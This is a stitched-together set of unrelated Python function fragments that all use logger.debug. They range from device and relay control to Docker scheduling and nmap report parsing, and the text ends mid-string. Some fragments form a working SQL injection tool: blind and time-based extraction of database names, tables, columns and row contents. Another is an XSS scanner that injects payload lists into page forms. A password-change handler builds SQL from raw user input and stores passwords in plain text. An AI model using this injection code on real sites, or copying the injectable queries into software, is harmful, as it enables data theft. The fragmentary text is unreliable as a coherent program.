def server(self): for device in self.devices.get(self.device_type): # 提取校验服务启动成功的端口 self.ports.append(device.get('port')) logger.debug('配置参数:%s'%device) tt = self.server_commond(kwargs=device)
def __del__(self): """ 销毁 """ self.conn.commit() self.conn.close() logger.debug('destroy database object')
def kill_server(self): """ adb如果重启 夜游神将不会被查到 :return: """ logger.debug('执行[KILL SERVER]操作:%s' % subprocess.getoutput("taskkill /F /IM node.exe /t"))
def payloads(file, rstr, rint, level): # declare list to save payloads plist = list() # check if specified file exist if file is None: logger.debug( "The payload file does not specify. Loading default payloads") logger.info("Generating payloads for level %s..." % (level)) plist = _open_file("data/basic.txt", plist, rstr, rint) if level == 2 or level == 3: plist = _open_file("data/body.txt", plist, rstr, rint) plist = _open_file("data/img.txt", plist, rstr, rint) plist = _open_file("data/div.txt", plist, rstr, rint) if level == 3: plist = _open_file("data/svg.txt", plist, rstr, rint) plist = _open_file("data/polyglot.txt", plist, rstr, rint) else: logger.info("Generating payloads for file %s..." % (file)) plist = _open_file(file, plist, rstr, rint) logger.info("%s payloads have been generated" % (len(plist))) return plist
def handle(param): ret = 0 username = param.get('username') passwd = param.get('password') if not username or not passwd: return {'ret':0, 'date': {'desc':'input error'}} #if not re.search(u'^[_a-zA-Z0-9\u4e00-\u9fa5]+$', username): # return {'ret':0, 'data': {'desc':'username is has (!,@,#,$,%...)'}} if not re.match(r"^1[35678]\d{9}$", username): return {'ret':0, 'data': {'desc':'username is not phonenum'}} tmp = userstruct.read_mysql(username) logger.debug(tmp) if tmp: return {'ret':0, 'data': {'desc':'username is exist'}} if len(passwd) < 6: return {'ret':0, 'data': {'desc':'passwd less 6'}} ret = sqlutil.InsertIntoDB('userinfo', {'username': username, 'password': passwd, 'salt':'11'}) if not ret: return {'ret':0, 'data': {'desc':'InsertIntoDB error'}} return {'ret':1, 'data': {'desc':'ok'}}
def __accept(self, sock: socket): conn, addr = sock.accept() logger.debug('accepted: {0}, from: {1}'.format(conn, addr)) conn.setblocking(False) self.__selector.register(conn, EVENT_READ) self.__connections[conn] = self.Connection(time.time()) self.__connected(conn)
def handle(param): ret = 0 userid = param.get('userid') skey = param.get('skey') oldpwd = param.get('oldpwd') newpwd = param.get('newpwd') logger.info("%s,%s", userid, skey) if userid and skey and oldpwd: tmp = userstruct.read_redis(userid) if not tmp or tmp.skey != skey: return {'ret': 0, 'data': {'des': 'skey error'}} if tmp.password != oldpwd: return {'ret': 0, 'data': {'des': 'oldpwd error'}} if not userstruct.checkpwdfrt(newpwd): return {'ret': 0, 'data': {'des': 'newpwd format error'}} #skey = md5('%s%s%s' % (tmp.username, time.ctime(), random.random())) #tmp.skey = skey #userstruct.write_redis_dict(userid, {'skey':skey}) sqlutil.execsqlcommit( "UPDATE userinfo SET `password` = '%s' where userid = %s" % (newpwd, userid)) logger.debug(tmp) return {'ret': 1, 'data': tmp.todict()} return {'ret': 0, 'data': {}}
def _do_basic_attack(self, method): logger.info("Finding forms in the page..") forms = self.get_inputs() # check if exist forms if len(forms) == 0: logger.warn("There aren't forms to check.") logger.warn("Please, add more info to find anything.") return logger.info("Detected %s forms." % (len(forms))) try: # scan each form for f in forms: logger.info("Checking XSS on form...") data = self.get_form_data(f) inputs = data['inputs'] if not inputs: logger.warn("The form has no fields to check") continue self._wrapUrl.kwargs[method] = data['inputs'] self._send_payload(inputs, method) except Exception as e: logger.debug(e)
def new_request(wrapUrl, timeout=None): # create dict to save request data kwargs = dict(wrapUrl.kwargs) method = kwargs['method'] # check if exist timeout, else use default value if timeout is not None: kwargs['timeout'] = timeout else: kwargs['timeout'] = DEFAULT_TIMEOUT kwargs = define_request(wrapUrl._url, **kwargs) try: session = requests.Session() request = session.request(method, wrapUrl._url, **kwargs) except Exception as e: logger.debug(e) finally: if request is not None: if request.status_code != 200: logger.error("%s (%s)" % (request.reason, request.status_code)) else: return request
def update(self, *args, **kwargs): logger.debug("{0:.3f} kW ({1:.2f}s)".format(args[0], args[1])) if self.is_started(): self.next(args[0], args[1]) else: # TODO: Find a better solution self.start()
def open(self): LogSocketHandler.waiters.add(self) logger.debug("WebSocket opened") self.write_message( json_encode({ 'COMMAND': network_api.COM_RELAY, 'STATUS': network_api.STA_RELOAD, 'DATA': server.get_relays() }))
def get_node(self, name): if name in self.nodes: return self.nodes[name] L.debug("Connecting to remote manager node %s"%name) self.async = True node = Node(name) self.nodes[name] = node if not node.exists: return node return node
def close_browser(browser): try: # close browser logger.info("Closing browser...") browser.quit() except Exception as e: logger.debug("Error to close browser") logger.debug(e) pass
def getMothMountPath(self): command = getMothMountPathCommand.format(self.device_path) mount_path, success = output_shell(command) self.mount_path = mount_path[:-1] if ( success and len(mount_path) > 3) else None logger.debug("getMothMountPath:{0}".format(self.mount_path)) return self.mount_path
def open_order(self, day, type: str, asset: Asset, coins, price, stop_loss=0.01): session = self.createSession() # Create an order instance o = Order( symbol=asset.symbol, type=type, status=OrderStatus.OPEN, coins=coins, open_price=price, #close_price=None, last_price=price, stop_loss=price + (price * stop_loss) if stop_loss else None, open_at=day, #closed_at=None, ) log = OrderLog(symbol=asset.symbol, type=o.type, status=o.status, price=price, timestamp=day) # Fail if order can't be placed if not self.can_open_order(asset, o): logger.debug("[Day {}] Cannot open order for {}".format( day, asset.symbol)) return None if o.type == OrderType.LONG: # Deduct order from allowance, which is in fiat for margin longs asset.long_allowance -= o.open_price * o.coins # In margin long orders we purchase coins using FIAT lent from our broker (so subject to allowance) asset.margin_coins += o.coins # Increase long orders count asset.long_orders += 1 elif o.type == OrderType.SHORT: # Deduct order from allowance, which is in coin for margin short asset.short_allowance -= o.coins # In margin short orders we sell coins lent from our broker (subject to allowance) at open price asset.margin_fiat += o.coins * o.open_price # Increase short orders count asset.short_orders += 1 elif o.type == OrderType.SPOT: # Deduct order buy price + fee from FIAT wallet asset.fiat -= o.open_price * o.coins + self.get_open_fee(o) # Add purchased coins to balance asset.coins += o.coins # Increase spot orders count asset.spot_orders += 1 session.add(o) session.add(log) session.commit() return o, log
def discover(cls): if cls.registered_modules: return cls.registered_modules = { name: importlib.import_module(name) for finder, name, ispkg in pkgutil.iter_modules( __path__, __name__ + ".") } logger.debug("Available models: {}".format( cls.registered_modules.keys()))
def cleanup_dead(self, name=None, id=None): self.refresh_status() for id, c in self.containers.items(): c = self.containers[id] if c['Running']: continue if name or id: if (id and id!=c['Id']) or (name and name not in c['Names']): continue self.client.remove_container(c['Id'], force=True) L.debug("Cleaned up dead container %s"%(c['Name'] or c['Id']))
def resetMoth(self): print("AudioMoth restarting") # Pulling the RST pin to ground forces the AudioMoth to restart self.rst.outputMode() self.rst.low() time.sleep(1) # Close the pin to allow RST to complete self.rst.close() logger.debug("resetMoth")
def __init__(self, kilo_watt, switch_on, switch_off, gpio_pin, relay_number): self.__kilo_watt = kilo_watt self.__switch_on = switch_on self.__switch_off = switch_off self.__gpio_pin = gpio_pin self.__relay_number = relay_number if self.__relay_number: logger.debug("Setup Relay {0}".format(self.__relay_number))
def server_command(self, **kwargs): command = 'appium -a {ip} -p {port} -U {udid} -g {log}'.format( ip=kwargs.get('ip'), port=kwargs.get('port'), udid=kwargs.get('udid'), log=kwargs.get('log_path')) logger.debug('启动服务执行的命令:%s' % command) subprocess.Popen(command, stdout=open(kwargs.get('log_path'), 'a+'), stderr=subprocess.PIPE, shell=True)
def getMothDeviceName(self): moth_device_name, success = output_shell(getMothDeviceNameCommand) self.device_name = moth_device_name[:-1] if ( success and len(moth_device_name) > 3) else None self.device_path = path_to_watch + '/' + moth_device_name[:-1] if ( success and len(moth_device_name) > 3) else None logger.debug("getMothDeviceName:{0}".format(self.device_name)) return self.device_name
def is_mounted(self): self.getMothMountPath() mounted = self.mount_path is not None and len(self.mount_path) > 3 if mounted: print("AudioMoth device mounted at {0}".format(self.mount_path)) else: print("m", end='', flush=True) logger.debug("is_mounted:{0}".format(mounted)) return mounted
def __prev_state(self): timestamp = time.perf_counter() if not self.__relay_switch_to == _OFF or self.__switch_timestamp == 0.0: self.__relay_switch_to = _OFF self.__switch_timestamp = timestamp elif timestamp - self.__switch_timestamp > self.__switch_off: GPIO.output(self.__gpio_pin, False) self.__relay_switch_is = _OFF return self.__return_state(self.prev) logger.debug("count = {0:>5.2f}, switch = {1:>5.2f}".format( timestamp - self.__switch_timestamp, self.__switch_off)) return self
def __next_state(self): timestamp = time.perf_counter() if not self.__relay_switch_to == _ON or self.__switch_timestamp == 0.0: self.__relay_switch_to = _ON self.__switch_timestamp = timestamp elif timestamp - self.__switch_timestamp > self.__switch_on: GPIO.output(self.__gpio_pin, True) self.__relay_switch_is = _ON return self.__return_state(self.next) logger.debug("count = {0:>5.2f}, switch = {1:>5.2f}".format( timestamp - self.__switch_timestamp, self.__switch_on)) return self
def is_detected(self): self.getMothDeviceName() detected = self.device_name is not None and len(self.device_name) > 3 if detected: print( f"AudioMoth device {self.device_name} detected at {self.device_path}" ) logger.debug(f"is_detected: {self.device_name} {self.device_path}") else: print("d", end='', flush=True) logger.debug(f"is_detected:-".format(detected)) return detected
def dump(self, username: str, include_root: bool, page_limit: int = 0): _followings = self.__fetch_followings_all(username) if include_root: _followings = [username] + _followings logger.debug(_followings) for self._following in _followings: logger.info(f"fetching following user: {self._following}") try: self.__fetch_stars_all(self._following, page_limit) logger.debug('saving changes to database') self.session.commit() except RuntimeError as e: logger.critical(str(e)) break
def __fetch_followings_all(self, username): _followings = [] _page = 1 while True: logger.debug(f"fetching following users: page {_page}") _followings_page = self.__fetch_followings_by_page(username, page=_page) if not _followings_page: break _followings += [ _following['login'] for _following in _followings_page ] _page += 1 return _followings
def test_sever(self): # 通过命令 一遍一遍的查找 如果有返回值则代表成功启动 没有返回值代表启动失败 #netstat - ano | findstr 4723 while True: s = subprocess.getoutput('netstat -ano | findstr %s' % self.ports[0]) if s: logger.debug('端口:【%s】 启动成功' % self.ports[0]) break else: logger.debug('端口:【%s】 启动失败 5秒后重试' % self.ports[0]) time.sleep(5) return True
def get_inputs(self, input_type="form"): try: request = get_forms_request(self._wrapUrl) #request = requests.get(self._wrapUrl._url) except Exception as e: logger.debug(e) pass bs = BeautifulSoup(request.content, "html.parser") inputs = [] # add inputs for i in bs.find_all(input_type): inputs.append(i) return inputs
def read_shapefiles(paths, param): logger.info("Start") scope_shp = gpd.read_file( paths["subregions"]) # Import shapefile of regions scope_shp = scope_shp.to_crs( epsg=4326) # In case it is not already in this format param["spatial_scope"] = sf.define_spatial_scope(scope_shp) param["Crd_all"] = sf.crd_merra( param["spatial_scope"], param["res_weather"]) # rectangle coordinates param = read_regions(param, scope_shp) param = read_EEZ(paths, param, scope_shp) logger.debug("End") return param
def test(self, output=1): # global conf if self.sqlirequest == "GET": payload = self.dealpayload.construct_request(self.payload) r = self.Data.GetData(payload) elif self.sqlirequest == "POST": payload = self.dealpayload.construct_request(self.payload) r = self.Data.PostData(payload) else: logger.error("self.sqlirequest error...") exit(0) if self.len == 0: logger.debug("Set the parameters of the self.len...") self.len = len(r) if output == 1: print r
def download_translation(self, archive, timestamp, suite, component): """ Download repository Translation files """ translation_files = [ f"/archive/{archive}/{timestamp}/dists/{suite}/{component}/i18n/Translation-en.bz2" ] for f in translation_files: localfile = self.localdir + f remotefile = f"{SNAPSHOT_DEBIAN}{f}" logger.debug(remotefile) if not url_exists(remotefile): logger.error(f"Cannot find {remotefile}") continue if os.path.exists(localfile): continue self.download(localfile, remotefile)
def schedule(self, nodes): number = 0 running = len(self.running(nodes)) schedule = self.cfg.get('schedule', 'spread') scaling = self.cfg.get('scaling', 'swarm') desired = self.cfg.get('desired', 1) leader_ip = '127.0.0.1' iternodes = [] if schedule == 'one_per_node': iternodes = [(k,v) for (k,v) in nodes.items() if not self.name in v.running_services] elif schedule == 'spread': needed = desired - running L.debug("Swarm Scheduling: %s, desired=%d, running=%d"%(self.name, desired, running)) if needed: iternodes = [nodes.items()[n%len(nodes)] for n in range(needed)] schedules=[] for name, node in iternodes: if scaling == 'raft': if running+number == 0: role = 'leader' leader_ip = node.ip else: role = 'member' else: role = 'member' cfg = deepcopy(self.cfg) if 'roles' in cfg and role in cfg['roles']: cfg.update(cfg['roles'][role]) cfg.update( { 'ip': node.ip, 'leader_ip': leader_ip, 'node': name, 'role': role, 'number': number, 'service': self.name, 'domain': self.manager.cfg.get('domain', '%(manager_name)s.srvr.dj')%cfg, }) schedules.append([node, cfg]) number = number+1 return schedules
def do(self): #gmail=Gamil('*****@*****.**', 'password' ) #gmail.send("*****@*****.**" ,"MONI Alert" ,"%s missing"%vmid) do() logger.debug('doing')
def get_tables(self): # 若databases_name未设置,就跑一下 if len(self.databases_name) == 0: logger.debug("Set the parameters of the self.databases_name...") SqliDatabases.get_database(self) # 每个databases_name需要跑一次tables_name for database_name in self.databases_name: # 开始跑database_name logger.debug("Start sqli databases %s's tables_name" % database_name) tables_name = [] logger.debug("The sqlirequest is %s, start sqli tables..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table amount sqli...") # 先注tables的数量 tables_number = normal_injection(select='COUNT(*)', source="information_schema.tables", conditions="table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest ) logger.debug("Table account sqli success...The tables_number is %d..." % tables_number) print "[*] tables_number: %d" % tables_number # 每个循环跑一次tables的数据 for i in trange(int(tables_number), desc="Table sqli...", leave=False, disable=True): # 首先是tablename的长度 logger.debug("Start %dth table length sqli..." % (i + 1)) table_name_len = normal_injection(select='length(`table_name`)', source="information_schema.tables", conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest ) logger.debug("%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len)) logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len)) # 然后注tablename logger.debug("Start %dth table name sqli..." % (i + 1)) table_name = normal_injection(select='`table_name`', source='information_schema.tables', conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest ) logger.debug("%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name)) # 把table_name插入列表 tables_name.append(table_name) logger.info("[*] %dth table_name: %s" % ((i + 1), table_name)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table amount sqli...") retVal = build_injection(select="COUNT(`table_name`)", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) tables_number = int(retVal) logger.debug("Tables amount sqli success...The tables_number is %d..." % tables_number) logger.info("[*] tables_number: %d" % tables_number) for i in range(0, int(tables_number)): # 然后注tables_name 的 length logger.debug("Start %dth table length sqli..." % (i + 1)) retVal = build_injection(select="length(`table_name`)", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) table_name_len = int(retVal) logger.debug("%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len)) logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len)) # 然后注tables名字 # 清空table_name table_name = "" logger.debug("Start %dth table sqli..." % (i + 1)) for j in trange(int(table_name_len), desc='%dth Table sqli' % (i + 1), leave=False): retVal = build_injection(select="ascii(substring(`table_name`," + repr(j + 1) + ",1))", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest) table_name += chr(retVal) logger.debug("%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name)) # 把table_name插入列表 tables_name.append(table_name) logger.info("[*] %dth table_name: %s" % ((i + 1), table_name)) elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table amount sqli...") retVal = time_injection(select="COUNT(`table_name`)", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) tables_number = int(retVal) logger.debug("Tables amount sqli success...The tables_number is %d..." % tables_number) logger.info("[*] tables_number: %d" % tables_number) for i in range(0, int(tables_number)): # 然后注tables_number 的length logger.debug("Start %dth table length sqli..." % (i + 1)) retVal = time_injection(select="length(`table_name`)", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) table_name_len = int(retVal) logger.debug("%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len)) logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len)) # 然后注tables名字 # 清空table_name table_name = "" logger.debug("Start %dth table sqli..." % (i + 1)) for j in trange(int(table_name_len), desc='%dth Table sqli' % (i + 1), leave=False): retVal = time_injection(select="ascii(substring(`table_name`," + repr(j + 1) + ",1))", source="information_schema.tables", conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest) table_name += chr(retVal) logger.debug("%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name)) # 把tables_name插入列表 tables_name.append(table_name) logger.info("[*] %dth table_name: %s" % ((i + 1), table_name)) self.tables_name[database_name] = tuple(tables_name) print "[*] tables_name list: ", self.tables_name
# iterate through xml(s) for xml_report in nmap_xml_reports: try: # trying to load xml file nmap_report = NmapParser.parse_fromfile(xml_report) logger.info("%s host(s) loaded from %s" % (len(nmap_report.hosts), xml_report)) except Exception, e: logger.warn("XML file %s corrupted or format not recognized" % xml_report) # keep looking for others xml continue # start a cumulative dictionary results = nmap_combine(nmap_report, results) #print "results: %s" % len(results) logger.info("Wraping up results") for ip_address in results: # colecting info for each field open_ports = check_ports(results[ip_address]['Port/Protocol']) hostnames = list_to_str(results[ip_address]['Domains']) notes = results[ip_address]['Notes'] os, os_version = fingerprint_decision(results[ip_address]['Operating System'], results[ip_address]['Port/Protocol']) #print ip_address, results[ip_address]['Operating System'] # write down to the final report file writer.writerow({'IP Address': ip_address, 'Port/Protocol': open_ports, 'Domains': hostnames, 'Operating System': os, 'OS Version': os_version, 'Notes': notes}) logger.debug("%s,%s,%s,%s,%s,%s" % (ip_address, open_ports, hostnames, os, os_version, notes)) logger.info("Done: %s" % csv_filename) sys.exit(0)
def play_by_schedule(self, node, schedule): s = schedule ip = s['ip'] name = s['node'] role = s.get('role', None) number = s.get('number', None) s['leader_ip'] = self.leader_ip s['container_name'] = container_name = s.get('container_name', '%(service)s.%(node)s.%(domain)s')%(s) labels = {'service': s['service']} labels.update(s.get('labels',{})) ports = map(str, s.get('ports', [])) dynamic = map(str, s.get('dynamic_ports', [])) expose = [] bind = {} for p in ports: if '/' in p: p, proto = p.split('/') else: proto = 'tcp' if ':' in p: h_p, c_p = map(int, p.split(':')) else: h_p = c_p = int(p) if proto in ['tcp', 'both']: expose.append(c_p) bind[c_p] = (node.ip, h_p) if proto in ['udp', 'both']: expose.append( (c_p, 'udp') ) bind['%s/udp'%c_p] = (node.ip, h_p) L.info('Opening static port on %s:%s to %s'%(node.ip, h_p, c_p)) for p in dynamic: if '/' in p: p, proto = p.split('/') else: proto = 'tcp' c_p = int(p) if proto in ['tcp', 'both']: expose.append(c_p) bind[c_p] = (node.ip, ) if proto in ['udp', 'both']: expose.append( (c_p, 'udp') ) bind['%s/udp'%c_p] = (node.ip, ) L.info('Opening dynamic port on %s to %s'%(node.ip, c_p)) node.cleanup_dead(name=container_name) if not node.is_running(name=container_name): build = s.get('build', None) image = build and s.get('service', '') or s.get('image', None) instance = node.run( name=container_name, hostname=container_name, image=image, build=build, ports=expose, command=s.get('command', '')%s, environment=[e%s for e in s.get('environment', [])], labels=labels, host_config = node.client.create_host_config( binds=s.get('volumes', None), port_bindings=bind, dns=[self.leader_ip], dns_search=[self.cfg.get('domain', None)], network_mode=s.get('network', None), ) ) else: L.debug("Already running %s"%(container_name))
def get_content(self, result, database_name, table_name, column_name, limits): # 开始注内容 content_len = 0 logger.debug("Start sqli table %s column %s limit %d content..." % (table_name, column_name, limits)) logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 注这一条的数据长度 logger.debug("Start %dth content length sqli..." % (limits + 1)) content_len = normal_injection(select="length(`" + column_name + "`)", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest ) logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content logger.debug("Start %dth content sqli..." % (limits + 1)) content = normal_injection(select="`" + column_name + "`", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest ) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 然后注content 的 length retVal = build_injection(select="length(`" + column_name + "`)", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) content_len = int(retVal) logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content名字 # 清空column_name content = "" logger.debug("Start %dth content sqli..." % (limits + 1)) for j in trange(int(content_len), desc='%dth Content sqli' % (limits + 1), leave=False): retVal = build_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest) content += chr(retVal) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 然后注content 的length retVal = time_injection(select="length(`" + column_name + "`)", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) content_len = int(retVal) logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content名字 # 清空column_name content = "" logger.debug("Start %dth content sqli..." % (limits + 1)) for j in trange(int(content_len), desc='%dth Database sqli' % (limits + 1), leave=False): retVal = time_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest) content += chr(retVal) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) logger.debug("Sqli table %s column %s limit %d success..." % (table_name, column_name, limits))
def get_content_count(self, database_name, table_name): # 开始注内容 logger.debug("Start sqli table %s content amount..." % table_name) logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) # 注数据的数量 content_count = normal_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest ) logger.debug("Content account sqli success...The count is %d..." % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) retVal = build_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) content_count = int(retVal) logger.debug("Content account sqli success...The content_count is %d..." % content_count) logger.info("[*] content_count: %d" % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) retVal = time_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) content_count = int(retVal) logger.debug("Content account sqli success...The content_count is %d..." % content_count) logger.info("[*] content_count: %d" % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count
def run_content(self): if len(self.columns_name) == 0: SqliColumns.get_columns(self) # 循环解包,进入注入 for database_name in self.columns_name: for table_name in self.columns_name[database_name]: # 获取数据的条数,如果小于设置的self.content_count,那需要设置条数等于self.content_count content_counts = self.get_content_count(database_name, table_name) if content_counts == 0: logger.warning('Database %s Table %s is empty...' % (database_name, table_name)) continue elif content_counts != self.content_count: logger.debug('Database %s Table %s content amount change to %d' % (database_name, table_name, content_counts)) self.content_count = content_counts else: pass # 声明一个表储存数据 content = PrettyTable(list(self.columns_name[database_name][table_name])) content.padding_width = 1 content.align = "r" # 每个表都要注入指定条数那么多次 for limits in xrange(self.content_count): # 声明一个队列,储存返回的值 result = Queue.Queue() # 声明线程队列、结果队列和最终插入table的数据队列 threads = [] results = [] contents = [] # 开始多线程的注入 logger.debug("Start multithreading Sqli...") for column_name in self.columns_name[database_name][table_name]: # 开始一个线程注入一个字段 try: t = threading.Thread(target=self.get_content, name='thread for %s' % column_name, args=(result, database_name, table_name, column_name, limits)) t.start() except: logger.error('Thread error...') threads.append(t) # 等待所有线程结束 for t in threads: t.join() # 注入处理返回数据,插入content中的一条 while not result.empty(): results.append(result.get()) # 处理返回的数据 for i in list(self.columns_name[database_name][table_name]): for item in results: if item[0] == i: contents.append(item[1]) else: continue # 插入数据 content_str = ','.join(contents) logger.info("Sqli success content is %s" % content_str) content.add_row(contents) # 输出表 logger.debug("Database %s Table %s sqli success..." % (database_name, table_name)) print "[*] Database %s Table %s content:" % (database_name, table_name) print content
def main(): logger.debug("Begin Scanner...") oparser()
def get_columns(self): # 若tables_name未设置,则全跑一遍 if len(self.tables_name) == 0: SqliTables.get_tables(self) # 首先是每个database_name for database_name in self.tables_name: # 每个databases_name声明为一个字典 self.columns_name[database_name]={} # 每个table_name需要跑一次columns_name for table_name in self.tables_name[database_name]: # 每个table_name中的columns_name声明为一个列表储存 columns_name = [] # 开始跑columns_name logger.debug("Start sqli databases %s's tables %s's columns..." % (database_name, table_name)) logger.debug("The sqlirequest is %s, start sqli columns..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s column amount sqli..." % table_name) # 先注columns的数量 columns_number = normal_injection(select='COUNT(*)', source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest ) logger.debug("Columns account sqli success...The columns_number is %d..." % columns_number) logger.info("[*] columns_number: %d" % columns_number) # 每个循环跑一次columns的数据 for i in trange(int(columns_number), desc="Column sqli...", leave=False, disable=True): # 首先是column name的长度 logger.debug("Start %dth column length sqli..." % (i + 1)) column_name_len = normal_injection(select='length(`column_name`)', source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest ) logger.debug("%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len)) logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len)) # 然后注columns name column_name = normal_injection(select='`column_name`', source='information_schema.columns', conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest ) logger.debug("%dth Column name sqli success...The column_name is %s..." % ((i + 1), column_name)) # 把columns_name插入列表 columns_name.append(column_name) logger.info("[*] %dth column_name: %s" % ((i + 1), column_name)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s column amount sqli..." % table_name) retVal = build_injection(select="COUNT(`column_name`)", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) columns_number = int(retVal) logger.debug("Columns account sqli success...The columns_number is %d..." % columns_number) logger.info("[*] columns_number: %d" % columns_number) for i in range(0, int(columns_number)): # 然后注 columns_number 的 length logger.debug("Start %dth column length sqli..." % (i + 1)) retVal = build_injection(select="length(`column_name`)", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) column_name_len = int(retVal) logger.debug("%dth Column name length sqli success...The column_name_len is %d..." % ((i + 1), column_name_len)) logger.info("[*] %dth column_name_len: %d" % ((i + 1), column_name_len)) # 然后注column名字 # 清空column_name column_name = "" logger.debug("Start %dth column sqli..." % (i + 1)) for j in trange(int(column_name_len), desc='%dth Column sqli' % (i + 1), leave=False): retVal = build_injection(select="ascii(substring(`column_name`," + repr(j + 1) + ",1))", source="information_schema.columns", conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest) column_name += chr(retVal) logger.debug("%dth Column name sqli success...The column_name is 